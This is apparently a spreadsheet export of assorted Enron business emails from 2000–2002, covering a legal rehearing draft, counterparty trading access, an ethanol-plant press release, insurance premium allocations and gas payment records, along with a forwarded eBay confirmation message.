To: ARM; 'Fairchild, Tracy'; Norm Plotkin; Gary Ackerman; Vicki Sandler; Anderson, Robert; Merilyn Ferrara; Herb Zinn; John Yurkanin; Max Bulk; Steve Huhman_x000D_
Cc: Lon W. House; Scott Blaising_x000D_
Subject: Direct Access Application for Rehearing_x000D_
Importance: High_x000D_
_x000D_
_x000D_
Attached for your review and comment is a third draft of the application for rehearing.  The main changes are (1) the addition of several more parties (and will those who arranged for these parties to sign on PLEASE forward a copy of this draft to your contacts so that they get to see it and know how to contact me with any comments or suggestions); and (2) a legislative history section which summarizes the various pertinent bills and resolutions._x000D_
 _x000D_
Please reply with any comments or suggested changes as soon as possible.  Thanks!_x000D_
 _x000D_
Dan_x000D_
 _x000D_
Law Offices of Daniel W. Douglass_x000D_
5959 Topanga Canyon Blvd.  Suite 244_x000D_
Woodland Hills, CA 91367_x000D_
Tel:   (818) 596-2201_x000D_
Fax:  (818) 346-6502_x000D_
douglass@energyattorney.com &lt;mailto:douglass@energyattorney.com&gt;</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 08:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'stephanie.sever@enron.com'})</t>
  </si>
  <si>
    <t>Re: Black Hills</t>
  </si>
  <si>
    <t xml:space="preserve">Stephanie and Tana:_x000D_
_x000D_
I have a revision to the profile for Black Hills Corp. -- read-only access _x000D_
for West power products (set them up to trade East power now) pending _x000D_
negotiation of master agreement._x000D_
_x000D_
Leslie_x000D_
----- Forwarded by Leslie Hansen/HOU/ECT on 08/21/2000 03:46 PM -----_x000D_
_x000D_
	Shari Stack_x000D_
	08/21/2000 03:30 PM_x000D_
		_x000D_
		 To: Leslie Hansen/HOU/ECT@ECT_x000D_
		 cc: Rhonda L Denton/HOU/ECT@ECT_x000D_
		 Subject: Re: Black Hills_x000D_
_x000D_
Leslie _x000D_
_x000D_
Spoke with Tim Belden and Mark Fischer from Portland. They said to give Black _x000D_
Hills "read-only" access until the EEI is signed. The client is OK with this.._x000D_
_x000D_
Shari_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Leslie Hansen_x000D_
	08/21/2000 02:22 PM_x000D_
		 _x000D_
		 To: Shari Stack/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Black Hills_x000D_
_x000D_
Shari:_x000D_
_x000D_
I understand from Rhonda that you are working on a Black Hills EEI Master.  _x000D_
This CP has applied for an EOL password, so this moves this up a notch in _x000D_
terms of current priority._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Leslie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 08:51:00 -0800 (PS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jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'monika.causholli@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 'chris.mallory@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'steve.gim@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'claudia.guerra@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@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marcus.nettelton@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fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'patrick.hanse@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'mark.fischer@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'evelyn.metoyer@enron.com', 'richard.broussard@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'christopher.watts@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jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'monica.lande@enron.com', 'matt.motley@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'paul.radous@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'clayton.vernon@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'jason.williams@enron.com', 'john.llodra@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'leaf.harasin@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'gwendolyn.williams@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'bill.iii@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'geir.solberg@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>El Paso Electric Company</t>
  </si>
  <si>
    <t>We have recevied the executed EEI Master Power Purchase and Sale Agreement _x000D_
dated 1/22/2001 from the referenced CP.  Copies will be distributed to Legal _x000D_
and Credit.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 02:04:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Northern Growers LLC Has Begun Construction on a $50 Million_x000D_
 Ethanol Plant in South Dakota, in an Advisory by Industrialinfo.com</t>
  </si>
  <si>
    <t>Welcome to eMail News Delivery, a service from Business Wire._x000D_
Here is your Industrial Information Resources Inc. news release._x000D_
If you have received this in error please send a message to:_x000D_
eMailDelivery@businesswire.com_x000D_
with the following command in the body of the message:_x000D_
 unsubscribe TX-INDUSTRIAL-INFO-RES_x000D_
If you have questions about this service, please contact your_x000D_
Business Wire Account Executive or service@businesswire.com_x000D_
_x000D_
_x000D_
BW2021  NOV 19,2001       2:02 PACIFIC      05:02 EASTERN_x000D_
_x000D_
_x000D_
( BW)(TX-INDUSTRIAL-INFO-RES) Northern Growers LLC Has Begun_x000D_
Construction on a $50 Million Ethanol Plant in South Dakota, in an_x000D_
Advisory by Industrialinfo.com_x000D_
_x000D_
    Business/Energy Editors_x000D_
_x000D_
	   HOUSTON--(BUSINESS WIRE)--Nov. 19, 2001--Researched by_x000D_
Industrialinfo.com (Industrial Information Resources Inc., Houston)._x000D_
Northern Growers LLC (Milbank, S.D.) has begun construction of a $50_x000D_
million grassroot ethanol plant near Milbank, S.D. Construction began_x000D_
on the project in June 2001. Northern Growers LLC has selected Broin_x000D_
and Associates (Sioux Falls, S.D.) to provide engineering,_x000D_
procurement, and construction services for the new plant._x000D_
	   The plant will produce 40 million gallons per year of ethanol_x000D_
using approximately 14.3 million bushels (40,000 bushels per day) of_x000D_
yellow corn as a feedstock. In addition, it will provide 120,000 tons_x000D_
per year of distillers dried grain with solubles (DDGS) that will be_x000D_
sold into established markets as a premium quality feed. The plant is_x000D_
expected to create 35 new jobs when it becomes operational in October_x000D_
2002._x000D_
	   Industrialinfo.com provides daily news related to the industrial_x000D_
market place including alerts and databases for the energy and_x000D_
industrial markets. For more information on trends and upcoming_x000D_
construction activities in the Synthetic Fuels industry as well as_x000D_
other industrial sectors send inquiries to_x000D_
synfuelsgroup@industrialinfo.com or visit us at www.industrialinfo.com_x000D_
and www.iirenergy.com._x000D_
_x000D_
    --30--EB/ho*_x000D_
_x000D_
    CONTACT: Industrialinfo.com, Houston_x000D_
             Jay Brunson, 713/783-5147_x000D_
_x000D_
    KEYWORD: TEXAS SOUTH DAKOTA_x000D_
    INDUSTRY KEYWORD: ENERGY FOODS/BEVERAGES OIL/GAS_x000D_
    SOURCE: Industrialinfo.com_x000D_
_x000D_
For the best viewing of the news releases please_x000D_
 use the following email settings:  Courier 10 point._x000D_
 -Notice of Copyright and General Disclaimer-_x000D_
 (c) 2000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_x000D_
_x000D_
- Notice of Copyright and General Disclaimer --_x000D_
(c) 1999 Business Wire. All of the releases provided by Business Wire_x000D_
are protected by copyright and other applicable laws, treaties and_x000D_
conventions. Information contained in the releases is furnished by_x000D_
Business Wire`s members who are solely responsible for their content,_x000D_
accuracy and originality. All reproduction, other than for an_x000D_
individual user`s reference, is prohibited without prior written_x000D_
permission.</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 15:04:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>thanks so much. please call me at office.  best, Jeff</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 03:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'charles200064@aol.com'})</t>
  </si>
  <si>
    <t>It's BIG MOMMA</t>
  </si>
  <si>
    <t xml:space="preserve">This is a picture of Rebecca's little girl._x000D_
---------------------- Forwarded by Dana Davis/HOU/ECT on 10/09/2000 10:19 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rebecca Sanchez_x000D_
06/15/2000 01:02 PM_x000D_
To: Dana Davis/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: It's BIG MOMMA_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jun 1999 04:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TW Payout Values</t>
  </si>
  <si>
    <t xml:space="preserve">Trevor,  Please review the spreadsheet and let me know if you agree.  The _x000D_
number in bolds are the values pulled from the existing TW net book value _x000D_
letter agreements_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'clement.abrams@enron.com', 'morris.clark@enron.com', 'michael.garberding@enron.com', 'cris.sherman@enron.com', 'sara.shackleton@enron.com', 'john.griffith@enron.com', 'donna.lowry@enron.com', 'pushkar.shahi@enron.com', 'joseph.deffner@enron.com', 'sandra.brawner@enron.com', 'william.bradford@enron.com', 'jeffrey.hodge@enron.com', 'molly.harris@enron.com'})</t>
  </si>
  <si>
    <t>FW: Draft Assignment Agreement Enron/Mahonia</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
_x000D_
Teresa G. Bushman_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3835A_x000D_
Houston, TX  77002_x000D_
(713) 853-7895_x000D_
fax (713) 646-3393_x000D_
teresa.g.bushman@enron.com_x000D_
_x000D_
_x000D_
----- Forwarded by Teresa G Bushman/HOU/ECT on 12/15/2000 04:37 PM -----_x000D_
_x000D_
	"Shouse, August" &lt;AShouse@velaw.com&gt;_x000D_
	12/15/2000 04:33 PM_x000D_
		 _x000D_
		 To: "Joseph M. Deffner (E-mail)" &lt;joseph.deffner@enron.com&gt;, "Teresa G. _x000D_
Bushman (E-mail)" &lt;teresa.g.bushman@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Draft Assignment Agreement Enron/Mahonia_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
-----Original Message-----_x000D_
From: MWilson@milbank.com  [mailto:MWilson@milbank.com]_x000D_
Sent: Friday, December 15, 2000 4:31  PM_x000D_
To: ashouse@velaw.com; drosser@velaw.com_x000D_
Cc:  philip.levy@chase.com; jeffrey.w.dellapina@chase.com; _x000D_
melissa.c.vogel@chase.com;  RWight@milbank.com; MWilson@milbank.com_x000D_
Subject: Draft Assignment  Agreement Enron/Mahonia_x000D_
_x000D_
_x000D_
_x000D_
Attached is a draft of the Assignment Agreement  between Mahonia, Chase, a _x000D_
Fleet entity and Chase, as agent.? Please send  any comments to my attention, _x000D_
with a copy to Richard Wight._x000D_
_x000D_
Regards, _x000D_
_x000D_
Melanie Wilson _x000D_
Milbank, Tweed, Hadley &amp; McCloy LLP _x000D_
One Chase Manhattan Plaza _x000D_
New York,  NY? 10005 _x000D_
ph.: 212-530-5098  _x000D_
fax: 212-530-5219 _x000D_
email:? mwilson@milbank.com _x000D_
_x000D_
_x000D_
&lt;&lt;4BK6C03!.DOC&gt;&g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CONFIDENTIALITY _x000D_
NOTICE+++++                                                                   _x000D_
The information in this email may be confidential and/or privileged.  This _x000D_
email is intended to be reviewed by only the individual or organization named _x000D_
above.  If you are not the intended recipient or an authorized representative _x000D_
of the intended recipient, you are hereby notified that any review, _x000D_
dissemination or copying of this email and its attachments, if any, or the _x000D_
information contained herein is prohibited.  If you have received this email _x000D_
in error, please immediately notify the sender by return email and delete _x000D_
this email from your system.  Thank You_x000D_
_x000D_
  _x000D_
_x000D_
 - 4BK6C03!.DOC</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joan.veselack@enron.com', 'steve.gillespie@enron.com', 'joann.collins@enron.com'})</t>
  </si>
  <si>
    <t>CES Data</t>
  </si>
  <si>
    <t>Hi campers.  Its that time of month again, I need all the transport _x000D_
information for CES for March.</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 13:17:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dickensheid.diane@enron.com', 'travis.mccullough@enron.com', 'pinto.leite@enron.com', 'harlan.murphy@enron.com', 'peter.del@enron.com', 'brent.hendry@enron.com', 't..hodge@enron.com', 'tanya.rohauer@enron.com', 'david.mitchell@enron.com', 'athena.alexander@enron.com', 'peter.keohane@enron.com', 'rick.antonoff@enron.com', 'steve.van@enron.com', 'elizabeth.sager@enron.com', 'marissa.morelle@enron.com', 'n..gray@enron.com', 'paul.simons@enron.com', 'morris.clark@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'lech.kalembka@enron.com', 'chris.gaffney@enron.com', 'gerald.nemec@enron.com', 'carol.st.@enron.com', 'sara.shackleton@enron.com', 'greg.johnston@enron.com', 'marcus.von@enron.com', 'michael.schuh@enron.com', 'h..douglas@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'rahul.saxena@enron.com', 'alan.aronowitz@enron.com', 'nora.dobin@enron.com', 'lisa.mellencamp@enron.com', 'credit &lt;.williams@enron.com&gt;', 'mary.cook@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Meeting Wednesday 28 at 10 (CDT) ECN 791</t>
  </si>
  <si>
    <t>_x000D_
Please bring the attached with you. _x000D_
_x000D_
      _x000D_
_x000D_
 _x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas 77002-7361_x000D_
(713) 345-7732_x000D_
(713) 646-3393 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Sat, 28 Apr 2001 13:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/28/01; HourAhead hour: 21;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/28/01; HourAhead hour: 21;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042821.txt</t>
  </si>
  <si>
    <t>Sat, 20 Oct 2001 00:16:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>Delivery Status Notification (Delay)</t>
  </si>
  <si>
    <t xml:space="preserve">This is an automatically generated Delivery Status Notification._x000D_
_x000D_
THIS IS A WARNING MESSAGE ONLY._x000D_
_x000D_
YOU DO NOT NEED TO RESEND YOUR MESSAGE._x000D_
_x000D_
Delivery to the following recipients has been delayed._x000D_
_x000D_
       /O=ENRON/OU=NA/CN=FOREIGN CONTACTS/CN=NEPCO/CN=MINDIVER_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=MCASH&gt;_x000D_
To: Mike.Indivero@nepco.com@ENRON &lt;??SMike.Indivero@nepco.com@ENRON&gt;, Mike.Croall@nepco.com, Indivero, Michael &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=FOREIGN CONTACTS/CN=NEPCO/CN=MINDIVER&gt;_x000D_
CC: Johnson, Rick &lt;/O=ENRON/OU=NA/CN=RECIPIENTS/CN=RJOHNSO&gt;_x000D_
Date: Friday, October 19, 2001 7:09:38 GMT_x000D_
Subject: _x000D_
_x000D_
As I mentioned earlier, I believe that the original should come to me for filing in the vault.  michelle _x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Mike.Indivero@nepco.com@ENRON  _x000D_
Sent:   Friday, October 19, 2001 1:20 PM _x000D_
To:     Mike.Croall@nepco.com; Indivero, Michael _x000D_
Cc:     Johnson, Rick; Cash, Michelle _x000D_
Subject:        RE: Weigle EEOC File _x000D_
_x000D_
suggest you send it here... _x000D_
_x000D_
&gt;  -----Original Message----- _x000D_
&gt; From:         FLO-Mike Croall _x000D_
&gt; Sent: Friday, October 19, 2001 11:05 AM _x000D_
&gt; To:   B-Mike Indivero _x000D_
&gt; Cc:   'Rick.Johnson@Enron.com'; 'Michelle.Cash@Enron.com' _x000D_
&gt; Subject:      Weigle EEOC File _x000D_
&gt; _x000D_
&gt; I have received the settlement agreement back from Mr. Weigle. Who wants _x000D_
&gt; to be the keeper of the file? I can send copies to everyone if necessary. _x000D_
&gt; Thanks, _x000D_
&gt; Mike </t>
  </si>
  <si>
    <t>Mon, 21 May 2001 05:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>World Hunger- Section 9.6 Additional tests - text of attachment</t>
  </si>
  <si>
    <t xml:space="preserve">9.6  Additional Factory Testing_x000D_
.  In the event that Purchaser reasonably determines that a factory test=20_x000D_
conducted by Seller or its Subcontractors was not conducted properly or the=_x000D_
=20_x000D_
results of the test were inconclusive Purchaser may required Seller to repe=_x000D_
at=20_x000D_
such test in a fashion as to obtain conclusive results. =20_x000D_
_x000D_
Purchaser may request Seller or its Subcontractors to  perform one or more =_x000D_
of=20_x000D_
its factory  tests using more precise instrumentation than planned, or=20_x000D_
conduct a test not in Seller=01,s or its Subcontractor=01,s standard factor=_x000D_
y test=20_x000D_
program.  In the case of a Purchaser request for an additional non standard=_x000D_
=20_x000D_
factory test the conduct of such test shall be subject to mutual agreement =_x000D_
by=20_x000D_
the parties. =20_x000D_
_x000D_
In the event as a result of such Purchaser requested repeat test, ormore=20_x000D_
precise instrumentation or non standard test  the Equipment is found to not=_x000D_
=20_x000D_
be compliant with the requirements of this Agreement, Seller shall correct=_x000D_
=20_x000D_
such noncompliance and the cost and time associated with such testing shall=_x000D_
=20_x000D_
be to Seller=01,s account.  If the Equipment is found to be compliant with =_x000D_
this=20_x000D_
Agreement, Seller shall be eligible for a Change Orderfor the cost and time=_x000D_
=20_x000D_
associated with such testing._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/21/2001 12:27=_x000D_
=20_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
John G Rigby@ENRON_DEVELOPMENT_x000D_
05/17/2001 05:13 AM_x000D_
To: Kay Mann/Corp/Enron@Enron, Scott=20_x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sheila Tweed/HOU/ECT@ECT, Ed B=_x000D_
=20_x000D_
Hearn III/HOU/ECT@ECT, pthompson@akllp.com, Scott=20_x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John=20_x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bill Williams/PDX/ECT@E=_x000D_
CT_x000D_
cc: =20_x000D_
_x000D_
Subject: World Hunger- Section 9.6 Additional tests_x000D_
_x000D_
Per the conference call of Wednesday, I revised Section 9.6 (with Scott=20_x000D_
fixing my drafting).  Attached document contains a redline of the section._x000D_
_x000D_
I think this can be included in the version that goes to GE.  I discussed t=_x000D_
he=20_x000D_
concept with Jim Sutherland- he agreed with relaxing the unilateral=20_x000D_
requirement in the case of GE.  We would not want to do this in the case of=_x000D_
=20_x000D_
other vendors._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 08:57:59 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit request Wasatch Energy, LLC</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Credit Approval Requested:_x000D_
_x000D_
Request submitted to CAS for Capacity Approval_x000D_
_x000D_
_x000D_
Shipper :		Wasatch Energy, LLC_x000D_
Contract # :		27723_x000D_
Service Type :	FT_x000D_
MDQ:			1,200 Dth/d (MDQ increase from 600 Dth/d)_x000D_
Rate:			No Change_x000D_
Term:			March 1, 2002 thru May 31, 2002_x000D_
_x000D_
_x000D_
Dennis P. Lee_x000D_
ETS_x000D_
Gas Logistics_x000D_
(713) 853-1715_x000D_
dennis.lee@enron.com</t>
  </si>
  <si>
    <t>Thu, 9 Mar 2000 09:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'wade.price@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'katherine.kelly@enron.com', 'chris.germany@enron.com'})</t>
  </si>
  <si>
    <t>CES Pool Gas</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the other producers for some of John Singer's "city gate"  gas. _x000D_
Please let me know if I can provide additional information to help finish _x000D_
setting up these for payment.   Thanks  WRP_x000D_
_x000D_
Producer   Pipe  Status_x000D_
_x000D_
Power Gas Marketing  PNG  fixed 3/9, will be paid 3/10_x000D_
    East Ohio fixed 3/9, will be paid 3/10_x000D_
_x000D_
Phillips Production   PNG  fixed 3/9, will be paid 3/10_x000D_
_x000D_
Phoenix Dominion  CPA/Cipco Deal 142669  Producer invoice available for _x000D_
information_x000D_
_x000D_
Questa Petroleum  CPA   Deal  213088 set up with meter number per 9911 pay _x000D_
statement.  Production statement for volumes_x000D_
      received from John Singer 3/8/00_x000D_
_x000D_
T &amp; F Operating   PennFuel Invoice in. Deal not set up. Not able to identify _x000D_
which Penn Fuel (56 or 56W) on CGAS_x000D_
_x000D_
Burkland, Richard  CPA  No invoice. Deal not set up. No info to go on_x000D_
Burkland, WIlliam S  CPA  No invoice. Deal not set up. No info to go on_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 08:14:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alove@houston.rr.com'})</t>
  </si>
  <si>
    <t>Fw: eBay Change E-mail</t>
  </si>
  <si>
    <t>_x000D_
----- Original Message -----_x000D_
From: &lt;aw-confirm@ebay.com&gt;_x000D_
To: &lt;alove@houston.rr.com&gt;_x000D_
Sent: Friday, January 18, 2002 10:05 AM_x000D_
Subject: eBay Change E-mail_x000D_
_x000D_
_x000D_
&gt; Dear plove1972,_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; PLEASE READ THIS MESSAGE OR YOUR E-MAIL CHANGE WILL NOT BE ACTIVATED!_x000D_
&gt;_x000D_
&gt; YOU MUST ENTER THE CONFIRMATION CODE CONTAINED IN THIS MESSAGE IN_x000D_
&gt; OUR CONFIRMATION FORM IN ORDER TO ACTIVATE YOUR CHANGE OF E-MAIL._x000D_
&gt;_x000D_
&gt; Please access the following form to confirm your change of e-mail:_x000D_
&gt;_x000D_
&gt;   http://cgi3.ebay.com/aw-cgi/ebayISAPI.dll?ChangeEmailConfirm&amp;bpuser=0_x000D_
&gt; You can also access this from our Registered User Services menu._x000D_
&gt;_x000D_
&gt; You will be asked for the following information, which you_x000D_
&gt; must type EXACTLY as it appears below:_x000D_
&gt;_x000D_
&gt;   User Id:            plove1972_x000D_
&gt;   New E-mail address: alove@houston.rr.com_x000D_
&gt;   Confirmation code:  21926_x000D_
&gt;_x000D_
&gt; Thank you for using eBay!_x000D_
&gt; http://www.ebay.com_x000D_
&gt;</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 09:40:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'l..bouillion@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'brian.redmond@enron.com', 'jacquelyn.azore@enron.com', 'jim.coffey@enron.com', 'paul.clayton@enron.com'})</t>
  </si>
  <si>
    <t>RE: Replacement Cost Values</t>
  </si>
  <si>
    <t xml:space="preserve">The 2001 annual allocated premium for these assets for property insurance is $670,000 based upon ENA's 2001 reported value of approximately $470,000,000.  The pro-rata credit for 7 months, assuming a 5-31-01 sale date, would be $390,833.  _x000D_
_x000D_
Underwriters require an update of values and exposures annually at renewal. Gathering these values within Enron normally requires 30 to 45 days.  We use these same values in the allocation system. Unless the value change is significant, the actual cost of insurance to the outside insurers will not change  Once you complete your entire study of replacement cost values, we can discuss whether approaching underwriters is warranted._x000D_
_x000D_
 If we internally adjust your allocation mid-year, we must move the premium that we take away from you to the other participants in the program.  As you know, the remainder of Enron did not stand still while you sold Bammel.  We have not tried this before, however, I suspect if approached with the additional premium as a result reducing ENA's allocation, all the other operating entities would want to re-submit their revised  values as well and we would find ourselves in a constant state of adjustment.  In view of the time required, this is neither practical nor cost effective for Enron.  In view of the relatively small numbers, I doubt that Corp. would entertain this proposition either, however, we can approach them if you wish.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Redmond, Brian  _x000D_
Sent:	Tuesday, October 09, 2001 9:26 AM_x000D_
To:	Clayton, Paul; Coffey Jr., Jim; Azore, Jacquelyn_x000D_
Cc:	Whiting, Greg; Gruesen, Karen; Helton, Susan; Koehler, Anne C.; Kitchen, Louise; Bouillion, James L._x000D_
Subject:	RE: Replacement Cost Values_x000D_
_x000D_
Paul:_x000D_
_x000D_
Please let me know how much of the 2000 insurance premium is being allocated to the approx. $700MM of HPL assets.  This charge is effectively "a cost of capital" and should be re-allocated to other groups with insured assets or should remain at Corp._x000D_
_x000D_
Regards,_x000D_
Brian _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clayton, Paul  _x000D_
Sent:	Tuesday, October 09, 2001 8:43 AM_x000D_
To:	Redmond, Brian; Coffey Jr., Jim; Azore, Jacquelyn_x000D_
Cc:	Whiting, Greg; Gruesen, Karen; Helton, Susan; Koehler, Anne C.; Kitchen, Louise; Bouillion, James L._x000D_
Subject:	RE: Replacement Cost Values_x000D_
_x000D_
Brian:_x000D_
_x000D_
This insurance is purchased on a portfolio basis with payment to underwriters at inception of the coverage. Values are adjusted annually at renewal. The premiums are allocated to the participating entities as part of the budget process and insignificant additions and deletions of assets do not normally result in premiums additions or refunds.  In the event that we discontinue premiums to North America for HLP, we have no mechanism to allocate that premium to the other assets that continue to be insured. In the event of a significant divestiture, underwriters may consider a refund, however, the values discussed below would not likely be significant when compared to Enron's values as a whole. Additionally, Enron's adverse loss experience affects the underwriters ability to return premium for small divestitures. _x000D_
_x000D_
At renewal, 4/01/02, North America's revised property values will be declared to underwriters as part of Enron's overall values and your premium allocation will adjust depending upon your values and loss experience as compared to the rest of Enron. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Paul_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Redmond, Brian  _x000D_
Sent:	Monday, October 08, 2001 5:31 PM_x000D_
To:	Coffey Jr., Jim; Clayton, Paul; Azore, Jacquelyn_x000D_
Cc:	Whiting, Greg; Gruesen, Karen; Helton, Susan; Koehler, Anne C.; Kitchen, Louise_x000D_
Subject:	RE: Replacement Cost Values_x000D_
_x000D_
Paul:_x000D_
_x000D_
Please confirm that ENA will not bear any insurance costs for the HPL assets for the second half of 2001 and the balance of years going forward?  If this is not the case, then we need to meet and discuss why this is not the case._x000D_
_x000D_
Thanks,_x000D_
Brian_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Coffey Jr., Jim  _x000D_
Sent:	Monday, October 08, 2001 5:25 PM_x000D_
To:	Clayton, Paul; Azore, Jacquelyn_x000D_
Cc:	Redmond, Brian; Whiting, Greg; Gruesen, Karen; Helton, Susan; Koehler, Anne C._x000D_
Subject:	RE: Replacement Cost Values_x000D_
_x000D_
Paul_x000D_
In addition to the 188,371,296 property value for Bammel Lease that you mentioned below there was also a value on your spreadsheet for Bammel Gas Storage of 267,000,000.  Requirements to insure both of these amounts should be with AEP not Enron and thus the 2002 Plan Premium Allocations of $754,096 on the Bammel Gas Storage 267,000,000 value and $924,433 on the Bammel Lease value of 188,371,296 should not be needed.  _x000D_
_x000D_
Jackie_x000D_
Please remove these amounts from the ENA-HPL 2002 Plan._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clayton, Paul  _x000D_
Sent:	Monday, October 08, 2001 5:10 PM_x000D_
To:	Coffey Jr., Jim_x000D_
Subject:	RE: Replacement Cost Values_x000D_
_x000D_
Jim:_x000D_
As discussed for the purposes of the 2002 Insurance Budget, we will delete the Bammel Lease (1409) property values of $188,371,296. We will advise the insurers effective this past June to delete these assets and will attempt to receive a refund. However, as respects asset divestitures, insurers have not been inclined in the past to refund premiums for comparatively small divestitures in view of our adverse loss experience. However, if we are successful in receiving a credit, we will refund the premium._x000D_
_x000D_
